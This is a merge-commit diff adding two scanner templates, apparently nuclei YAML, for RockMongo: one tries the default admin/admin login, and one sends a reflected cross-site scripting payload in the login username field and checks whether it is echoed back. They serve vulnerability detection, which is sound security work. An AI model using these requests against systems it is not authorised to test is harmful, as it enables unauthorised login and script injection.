Merge pull request #940 from pikpikcu/patch-83

add rockmongo dlogin/ xss rockmongo

default-logins/rockmongo/rockmongo-default-credentials.yaml

@@ -0,0 +1,31 @@
+id: rockmongo-default-credentials
+
+info:
+  name: Rockmongo Default Credentials
+  author: pikpikcu
+  severity: high
+  tags: rockmongo,dlogin
+
+requests:
+  - raw:
+      - |
+        POST /index.php?action=login.index HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{Hostname}}/index.php?action=login.index
+
+        more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Location: /index.php?action=admin.index&host=0"
+          - "Set-Cookie: ROCK_LANG="
+        part: header
+
+      - type: status
+        status:
+          - 302

vulnerabilities/other/rockmongo-xss.yaml

@@ -0,0 +1,33 @@
+id: rockmongo-xss
+
+info:
+  name: RockMongo V1.1.8 XSS
+  author: pikpikcu
+  severity: medium
+  reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
+  tags: rockmongo,xss
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?action=login.index"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '"><script>alert(document.domain)</script>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'Content-Type: text/html'
+        part: header